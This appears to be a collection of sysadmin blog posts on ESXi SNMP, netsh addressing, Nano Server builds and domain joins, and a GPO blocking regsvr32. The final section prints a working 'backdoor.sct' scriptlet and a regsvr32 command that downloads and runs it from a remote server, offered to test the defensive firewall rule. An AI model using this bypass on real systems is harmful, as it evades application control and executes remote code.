Monitor ESXi Free using SNMP

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

ESXi 4.1 and 5.0 Enable SNMP

SSH to the host and edit the snmp.xml file:

vi /etc/vmware/snmp.xml

Make the following changes:

<config>
<snmpSettings>
<enable>true</enable>
<communities>public</communities>
<targets>192.168.1.100@public</targets>
</snmpSettings>
</config>

Restart management agents with the following command:

/etc/init.d/hostd restart

ESXi 5.1 and 5.5 Enable SNMP

SSH to the host and run the following command:

esxcli system snmp set --communities=public --enable=yes --targets=192.168.1.100/public

Test SNMP trap

vicfg-snmp --server <ESXiServerIP> --username root --password <Password> --test
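A minimal trap receiver to run on the notification target (192.168.1.100 above) while issuing the --test command, so you can confirm the trap actually leaves the host and reaches UDP 162 before suspecting the monitoring tool. This is an added example, not code from the original post; it decodes only the SNMP message header (version, community, PDU tag), and the port and timeout defaults are assumptions.

```powershell
function Read-BerLength([byte[]]$b, [int]$i) {
    # Returns the decoded BER length and the index of the first content byte.
    if ($b[$i] -lt 0x80) { return @([int]$b[$i], ($i + 1)) }
    $n = $b[$i] -band 0x7F
    $len = 0
    for ($k = 1; $k -le $n; $k++) { $len = ($len -shl 8) -bor [int]$b[$i + $k] }
    return @($len, ($i + 1 + $n))
}

function ConvertFrom-SnmpTrapHeader([byte[]]$b) {
    # Message ::= SEQUENCE { version INTEGER, community OCTET STRING, data PDU }
    if ($b.Length -lt 7 -or $b[0] -ne 0x30) { throw 'datagram is not a BER SEQUENCE' }
    $null, $i = Read-BerLength $b 1
    if ($b[$i] -ne 0x02 -or $b[$i + 1] -ne 0x01) { throw 'version field missing' }
    $version = [int]$b[$i + 2]
    $i += 3
    if ($b[$i] -ne 0x04) { throw 'community field missing' }
    $clen, $i = Read-BerLength $b ($i + 1)
    $community = [System.Text.Encoding]::ASCII.GetString($b, $i, $clen)
    $i += $clen
    [pscustomobject]@{
        Version   = $version                                 # 0 = SNMPv1, 1 = SNMPv2c
        Community = $community
        IsTrap    = ($b[$i] -eq 0xA4 -or $b[$i] -eq 0xA7)   # v1 Trap-PDU or v2 SNMPv2-Trap-PDU
    }
}

function Wait-SnmpTrap([int]$Port = 162, [int]$TimeoutSeconds = 60) {
    # Binds UDP/$Port (run elevated), waits for one datagram and decodes its header.
    $client = New-Object System.Net.Sockets.UdpClient($Port)
    $client.Client.ReceiveTimeout = $TimeoutSeconds * 1000
    $remote = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, 0)
    try {
        $bytes = $client.Receive([ref]$remote)
        $hdr = ConvertFrom-SnmpTrapHeader $bytes
        [pscustomobject]@{
            Sender    = $remote.Address.ToString()   # should be the ESXi host's address
            Version   = $hdr.Version
            Community = $hdr.Community               # should match the configured community
            IsTrap    = $hdr.IsTrap
        }
    } catch [System.Net.Sockets.SocketException] {
        Write-Warning "no datagram arrived on UDP/$Port within $TimeoutSeconds s"
    } finally { $client.Close() }
}

# Start this on the trap target, then run the vicfg-snmp --test command from the vMA/vCLI host.
Wait-SnmpTrap
```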

Reviewing the SNMP configuration

When I look at my SNMP configuration using vCLI (once again, this is a read operation so I can use vCLI), I see the following.

vi-admin@vma:~> vicfg-snmp --server <ESXiServerIP> --username root --password <Password> -s

Current SNMP agent settings:
Enabled : 1
UDP port : 161

Communities :
public

Notification targets :
192.168.1.100@162/public

Options :
EnvEventSource=indications

Use netsh to set interface IP static or dhcp

Get Configuration Info

Using the command below, you can gather information on the adapter’s current configuration. Make note of the connection name, since that is what is used in the configuration command further down.

netsh interface ip show config
Figure 1 – Example of netsh interface ip show config

You can see the existing configuration with the following command.

netsh interface ip dump

Figure 2 – Example of netsh interface ip dump

Set Interface DHCP

To set the interface address via DHCP, issue the following.  Change the items highlighted in Red to suit your environment.

Note:  Use the above command (netsh interface ip dump) to figure out which interface you need to use.  Default is “Local Area Connection” but many environments will differ.  Match the interface= portion and supply that in the Red sections below.  I’m leaving the default of “Local Area Connection” but you can see that my interface would be “Ethernet”.


Figure 3 – Determine the interface name to use when configuring the interface via netsh

netsh interface ip set address "Local Area Connection" dhcp

You can also set the DNS servers statically or via DHCP.

netsh interface ip set dns "Local Area Connection" static 8.8.4.4

Set a secondary DNS server:

netsh interface ip add dns "Local Area Connection" 8.8.4.4 index=2

Set Interface Static

Set the interface with a static address. Change the items in Red to suit your environment.

netsh interface ip set address "Local Area Connection" static ipaddr subnetmask gateway metric

Set the DNS server statically.

netsh interface ip set dns "Local Area Connection" static 8.8.4.4

Set a secondary DNS server:

netsh interface ip add dns "Local Area Connection" 8.8.4.4 index=2
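The netsh commands above wrapped in one PowerShell function that first checks the interface name against the output of netsh interface ip show config and stops on a non-zero exit code, so a typo in the connection name fails before anything is changed. Added example, not from the original post; the function name and the sample addresses are assumptions.

```powershell
function Set-NetshInterfaceAddressing {
    param(
        [Parameter(Mandatory)] [string] $InterfaceName,
        [switch]   $Dhcp,
        [string]   $IPAddress,
        [string]   $SubnetMask,
        [string]   $Gateway,
        [int]      $Metric = 1,
        [string[]] $DnsServers
    )
    # 'netsh interface ip show config' prints one 'Configuration for interface "<name>"'
    # header per adapter; refuse to continue if the requested name is not among them.
    $known = netsh interface ip show config |
        Select-String -Pattern 'Configuration for interface "(.+)"' |
        ForEach-Object { $_.Matches[0].Groups[1].Value }
    if ($known -notcontains $InterfaceName) {
        throw "Unknown interface '$InterfaceName'. Found: $($known -join ', ')"
    }

    if ($Dhcp) {
        netsh interface ip set address "$InterfaceName" dhcp
    } elseif ($IPAddress -and $SubnetMask -and $Gateway) {
        netsh interface ip set address "$InterfaceName" static $IPAddress $SubnetMask $Gateway $Metric
    } else {
        throw 'Specify -Dhcp, or -IPAddress, -SubnetMask and -Gateway together'
    }
    if ($LASTEXITCODE -ne 0) { throw "netsh set address failed with exit code $LASTEXITCODE" }

    if ($DnsServers) {
        # 'set dns ... static' replaces the list; further servers are appended with 'add dns'.
        $primary = $DnsServers[0]
        netsh interface ip set dns "$InterfaceName" static $primary
        for ($n = 1; $n -lt $DnsServers.Count; $n++) {
            $server = $DnsServers[$n]
            $index  = $n + 1
            netsh interface ip add dns "$InterfaceName" $server "index=$index"
        }
    } elseif ($Dhcp) {
        netsh interface ip set dns "$InterfaceName" dhcp
    }
    if ($LASTEXITCODE -ne 0) { throw "netsh dns change failed with exit code $LASTEXITCODE" }
}

# Usage with constructed values; the interface name is whatever 'show config' reported.
# Set-NetshInterfaceAddressing -InterfaceName 'Ethernet' -Dhcp
# Set-NetshInterfaceAddressing -InterfaceName 'Ethernet' -IPAddress 192.168.1.50 `
#     -SubnetMask 255.255.255.0 -Gateway 192.168.1.1 -DnsServers 8.8.4.4, 8.8.8.8
```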

Join Nano Server to a Domain

To join my Windows Server 2016 Nano server to my test domain I used the djoin.exe (Domain Join) command.

From a domain controller, or server already joined to my domain, I run the following command.  This will create a file called NANOSERVERTP5 at the location I run the command.

(Change items highlighted in Red)

djoin.exe /provision /domain TESTDOMAIN /machine NANOSERVERTP5 /reuse /savefile .\NANOSERVERTP5


Copy the NANOSERVERTP5 file to C: on the Nano Server.  I temporarily enabled File and Sharing through the Firewall on the Nano Server in order to gain access to the Administrative share, so I could copy it to \\192.168.100.50\c$.

In order to enter into a remote PowerShell session, I needed to make sure I had a trusted host entry for my Nano Server in Web Services Management (WS-Management, or WSMan).  I launched an administrative PowerShell shell.  Also, make sure the WinRM service is running on the machine you’ll be using (net start winrm).

(Change items highlighted in Red)

Set-Item WSMan:\localhost\Client\TrustedHosts -Value 192.168.100.50 -Concatenate

Accept (Y) the WinRM security prompt.

Start a remote PowerShell session into the Nano Server.

Enter-PSSession -ComputerName 192.168.100.50 -Credential Administrator

Run djoin and specify the location that the NANOSERVERTP5 file was copied to; in my case, C:\NANOSERVERTP5.

djoin /requestodj /loadfile c:\NANOSERVERTP5 /windowspath c:\windows /localos
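The same offline join scripted end to end from the domain-joined machine, copying the blob over the PowerShell session instead of the C$ share and checking djoin's exit codes at both ends. Added example, not the post's own code; it assumes PowerShell 5 or later on the local side for Copy-Item -ToSession, and the domain, machine name and address are constructed placeholders.

```powershell
$Domain   = 'TESTDOMAIN'        # constructed placeholder values
$Machine  = 'NANOSERVERTP5'
$NanoIP   = '192.168.100.50'
$BlobPath = Join-Path $PWD $Machine

# 1. Provision the computer account and write the offline-join blob to the current folder.
djoin.exe /provision /domain $Domain /machine $Machine /reuse /savefile $BlobPath
if ($LASTEXITCODE -ne 0) { throw "djoin /provision failed with exit code $LASTEXITCODE" }

# 2. Trust the Nano host for WinRM (it is not yet a domain member) and open a session.
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $NanoIP -Concatenate -Force
$session = New-PSSession -ComputerName $NanoIP -Credential (Get-Credential 'Administrator')

try {
    # 3. Copy the blob over the session; no File and Printer Sharing exception needed.
    Copy-Item -Path $BlobPath -Destination "C:\$Machine" -ToSession $session

    # 4. Request the offline join on the Nano Server and bring back djoin's exit code.
    $rc = Invoke-Command -Session $session -ArgumentList "C:\$Machine" -ScriptBlock {
        param($blob)
        djoin /requestodj /loadfile $blob /windowspath C:\Windows /localos | Out-Null
        $LASTEXITCODE
    }
    if ($rc -ne 0) { throw "djoin /requestodj failed on $NanoIP with exit code $rc" }
} finally {
    Remove-PSSession $session
    # The blob carries the new machine account's credentials, so remove the local copy.
    Remove-Item $BlobPath -Force -ErrorAction SilentlyContinue
}
```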

Create Nano Server Image

I was trying to build a Nano Server image (2016 Tech Preview 5) and kept getting an error.

Turns out that is because the documentation is not updated and instead of -GuestDrivers it now uses:

  1. -Edition [ Standard | Datacenter ]
  2. -DeploymentType [ Guest | Host ]

Running the following updated command works without issue building the image.

(Change items highlighted in Red)

New-NanoServerImage -MediaPath c:\tp5iso -BasePath .\Base -TargetPath .\Nano1\Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard

Add Packages

You can add packages to the image that is being built by specifying -Packages [PackageName].

To install IIS, for example:
(Change items highlighted in Red)

New-NanoServerImage -MediaPath c:\tp5iso -BasePath .\Base -TargetPath .\Nano1\Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard -Packages Microsoft-NanoServer-IIS-Package

Here’s a listing of the Packages in the Server 2016 TP5 ISO as of this writing.

I used the following command within the Packages directory of the Nano distribution to generate this.

PS C:\users\rkreider\desktop\nano\base\Packages> gci . -filter *.cab | foreach-object { write-output $_.basename; dism /online /get-packageinfo /packagepath:$($_.FullName) | select-string "Description|Product Name|^Name :"; }
  • Microsoft-NanoServer-BootFromWim-Package
    Description : Boot from WIM support
    Name : Boot from WIM support
    Product Name : Microsoft-NanoServer-BootFromWim-Feature-Package
  • Microsoft-NanoServer-Compute-Package
    Description : Hyper-V provides the services that you can use to create and manage virtual machines and their resources. Each virtual machine is a virtualized computer system that operates in an isolated execution environment. This allows you to run multiple operating systems simultaneously.
    Name : Hyper-V
    Product Name : Microsoft-NanoServer-Compute-Feature-Package
  • Microsoft-NanoServer-Containers-Package
    Description : Provides services and tools to create and manage Windows Server Containers and their resources.
    Name : Containers
    Product Name : Microsoft-NanoServer-Containers-Feature-Package
  • Microsoft-NanoServer-DCB-Package
    Description : Data Center Bridging (DCB) is a suite of IEEE standards that are used to enhance Ethernet local area networks by providing hardware-based bandwidth guarantees and transport reliability. Use DCB to help enforce bandwidth allocation on a Converged Network Adapter for offloaded storage traffic such as Internet Small Computer System Interface, RDMA over Converged Ethernet, and Fibre Channel over Ethernet.
    Name : Data Center Bridging
    Product Name : Microsoft-NanoServer-DCB-Feature-Package
  • Microsoft-NanoServer-Defender-Package
    Description : Windows Server Antimalware helps protect your machine from malware.
    Name : Windows Server Antimalware
    Product Name : Microsoft-NanoServer-Defender-Feature-Package
  • Microsoft-NanoServer-DNS-Package
    Description : Domain Name System (DNS) Server provides name resolution for TCP/IP networks. DNS Server is easier to manage when it is installed on the same server as Active Directory Domain Services. If you select the Active Directory Domain Services role, you can install and configure DNS Server and Active Directory Domain Services to work together.
    Name : DNS Server
    Product Name : Microsoft-NanoServer-DNS-Feature-Package
  • Microsoft-NanoServer-DSC-Package
    Description : Windows PowerShell Desired State Configuration is a configuration management platform that uses a declarative syntax to express and enact system configuration state.
    Name : Windows PowerShell Desired State Configuration
    Product Name : Microsoft-NanoServer-DSC-Feature-Package
  • Microsoft-NanoServer-FailoverCluster-Package
    Description : Failover Clustering allows multiple servers to work together to provide high availability of server roles. Failover Clustering is often used for File Services, virtual machines, database applications, and mail applications.
    Name : Failover Clustering Service
    Product Name : Microsoft-NanoServer-FailoverCluster-Feature-Package
  • Microsoft-NanoServer-Guest-Package
    Description : Hyper-V guest drivers for using Nano Server as a virtual machine
    Name : Hyper-V guest drivers
    Product Name : Microsoft-NanoServer-Guest-Feature-Package
  • Microsoft-NanoServer-Host-Package
    Description : Support for bare metal deployments
    Name : Bare metal deployment
    Product Name : Microsoft-NanoServer-Host-Feature-Package
  • Microsoft-NanoServer-IIS-Package
    Description : Web Server (IIS) provides a reliable, manageable, and scalable Web application infrastructure.
    Name : Web Server (IIS)
    Product Name : Microsoft-NanoServer-IIS-Feature-Package
  • Microsoft-NanoServer-NPDS-Package
    Description : Network Performance Diagnostics Service (NPDS)
    Name : Network Performance Diagnostics Service (NPDS)
    Product Name : Microsoft-NanoServer-NPDS-Feature-Package
  • Microsoft-NanoServer-OEM-Drivers-Package
    Description : Server Core drivers
    Name : Server Core drivers
    Product Name : Microsoft-NanoServer-OEM-Drivers-Feature-Package
  • Microsoft-NanoServer-SCVMM-Compute-Package
    Description : System Center Virtual Machine Manager Hyper-V agent
    Name : System Center Virtual Machine Manager Hyper-V agent
    Product Name : Microsoft-NanoServer-SCVMM-Compute-Feature-Package
  • Microsoft-NanoServer-SCVMM-Package
    Description : System Center Virtual Machine Manager agent
    Name : System Center Virtual Machine Manager agent
    Product Name : Microsoft-NanoServer-SCVMM-Feature-Package
  • Microsoft-NanoServer-SecureStartup-Package
    Description : Secure Startup support
    Name : Secure Startup support
    Product Name : Microsoft-NanoServer-SecureStartup-Feature-Package
  • Microsoft-NanoServer-ShieldedVM-Package
    Description : Host Guardian provides the features necessary on a Hyper-V server to provision Shielded Virtual Machines.
    Name : Shielded VM support
    Product Name : Microsoft-NanoServer-ShieldedVM-Feature-Package
  • Microsoft-NanoServer-Storage-Package
    Description : File Server role and other storage components
    Name : File Server role and other storage components
    Product Name : Microsoft-NanoServer-Storage-Feature-Package

GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker by using regsvr32.exe poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO, named it “Firewall: Block regsvr32”, then edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.


Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard


Choose Program as the type of rule to create and click Next >


Use C:\windows\system32\regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose it.


Choose Block as the action and click Next >


Apply it to all network locations.


Give the rule a name and possibly a description.


The block rule is now listed in Inbound Rules.

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file yourself (it doesn’t have to have the extension .SCT; it can be anything…).

backdoor.sct

<?XML version="1.0"?>
<scriptlet>
<registration
 progid="Empire"
 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language="JScript">
 <![CDATA[

 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).
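A check for the policy actually in effect after gpupdate /force that does not depend on running the scriptlet: it looks in the active firewall store for enabled Block rules whose program filter is regsvr32.exe in either direction, plus a helper that creates the same two rules locally on a machine outside the domain. Added example, not the post's own code; rule names are assumptions, and the NetSecurity cmdlets need Windows 8 / Server 2012 or later (on Windows 7 use netsh advfirewall firewall add rule with the same values).

```powershell
$Program = "$env:SystemRoot\System32\regsvr32.exe"

function New-RegsvrBlockRules {
    # Same result as the two wizard runs above: one program rule per direction, action Block,
    # all profiles. Skipped if a rule with that display name already exists.
    foreach ($dir in 'Inbound', 'Outbound') {
        $name = "Block regsvr32 ($dir)"   # assumed rule names
        if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name -Direction $dir -Program $Program `
                -Action Block -Profile Any -Enabled True | Out-Null
        }
    }
}

function Test-RegsvrBlocked {
    # ActiveStore is the merged local + Group Policy rule set, so a rule delivered by the
    # GPO after 'gpupdate /force' shows up here even though it was never created locally.
    # GPO-authored rules usually store the path as %SystemRoot%\..., hence the expansion.
    $rules = Get-NetFirewallRule -PolicyStore ActiveStore -Action Block -Enabled True |
        Where-Object {
            $p = ($_ | Get-NetFirewallApplicationFilter).Program
            $p -and ([Environment]::ExpandEnvironmentVariables($p) -ieq $Program)
        }
    $dirs = @($rules | ForEach-Object { "$($_.Direction)" })
    [pscustomobject]@{
        InboundBlocked  = $dirs -contains 'Inbound'
        OutboundBlocked = $dirs -contains 'Outbound'
        Rules           = @($rules | ForEach-Object { $_.DisplayName })
    }
}

# New-RegsvrBlockRules   # local equivalent of the GPO, for a standalone machine
Test-RegsvrBlocked
```

Both InboundBlocked and OutboundBlocked should read True on a domain member once the GPO has applied; if the scriptlet test still opens a command window, compare the listed rule names with what the GPO was supposed to deliver.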